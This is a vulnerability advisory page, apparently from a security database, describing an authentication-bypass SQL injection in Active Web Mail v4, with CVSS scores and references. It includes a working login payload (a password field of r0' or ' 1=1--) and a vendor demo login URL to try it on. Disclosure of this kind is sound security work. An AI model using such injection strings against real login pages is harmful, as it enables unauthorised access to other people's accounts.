Active Web Mail v 4 (Auth Bypass) Remote SQL Injection Vulnerability

2009.01.29
Credit: D3v!L
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

[~] ------------------------------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor: www.activewebsoftwares.com [~]Software: Active Web Mail v 4 [~]author: ((Ñ�3d D3v!L)) [~] Date: 28.11.2008 [~] Home: www.ahacker.biz [~] contact: N/A [~] -----------------------------{str0ke}------------------------------ [~] Exploit: Email: any mail password: r0' or ' 1=1-- [~]login 4 d3m0: www.activewebsoftwares.com/DemoActiveWebmail/login.aspx [~]-----------------------------{str0ke}--------------------------------------------------- [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] [~] spechial thanks : dolly & 7am3m & عÙ�Øد ,ØÙ�زÙ�Ù�رÙ� [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] [~] xp10.biz & ahacker.biz [~] [~]--------------------------------------------------------------------------------

Referencje:

http://xforce.iss.net/xforce/xfdb/46915
http://www.milw0rm.com/exploits/7281
http://secunia.com/advisories/32921


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top